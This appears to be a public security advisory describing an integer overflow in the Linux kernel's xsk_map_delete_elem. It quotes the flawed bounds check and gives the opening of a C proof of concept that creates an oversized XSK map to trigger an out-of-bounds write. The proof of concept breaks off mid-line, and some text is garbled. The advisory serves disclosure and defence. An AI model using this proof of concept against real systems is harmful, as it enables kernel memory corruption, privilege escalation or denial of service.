**security-research** Public
# Linux Kernel: Integer Overflow in eBPF XSK map_delete_elem Leads to Out-of-Bounds
## Package
## Affected versions
## Patched versions
## Description
### Summary
AF_XDP sockets provide a high-performance mechanism for packet processing within the kernel. This bug report describes an integer overflow vulnerability in the `xsk_map_delete_elem` (function) when handling eBPF (XSK) maps, potentially leading to an out-of-bounds write and subsequent security risks.
### Severity
Moderate – This vulnerability can allow an attacker to This could allow them to hijack the control flow of the kernel and execute arbitrary code with kernel privilege and or a denial of service.
### Proof of Concept
In the `xsk_map_delete_elem` function an unsigned integer ( `map->max_entries`) is compared with a user-controlled signed integer ( `k`). Due to implicit type conversion, a large unsigned value for `map->max_entries` can bypass the intended bounds check:
“`
if (k >= map->max_entries) return -EINVAL;
“`
This allows k to hold a negative value (between -2147483648 and -2), which is then used as an array index in `m->xsk_map[k]`, which results in an out-of-bounds access.
“`
spin_lock_bh(&m->lock); map_entry = &m->xsk_map[k]; // Out-of-bounds map_entry old_xs = unrcu_pointer(xchg(map_entry, NULL)); // Oob write if (old_xs) xsk_map_sock_delete(old_xs, map_entry); spin_unlock_bh(&m->lock);
“`
The `xchg` operation can then be used to cause an out-of-bounds write. Moreover, the invalid `map_entry` passed to `xsk_map_sock_delete` can lead to further memory corruption.
“`
// compile with gcc -o map_poc map_poc.c -lbpf #include #include #include #include #include #include #include int main() { // Create a large enough BPF XSK map int map_fd; union bpf_attr create_attr = { .map_type = BPF_MAP_TYPE_XSKMAP, .key_size = sizeof(int), .value_size = sizeof(int), .max_entries = 0x80000000 + 2, }; map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &create_attr, sizeof(create_attr)); if (map_fd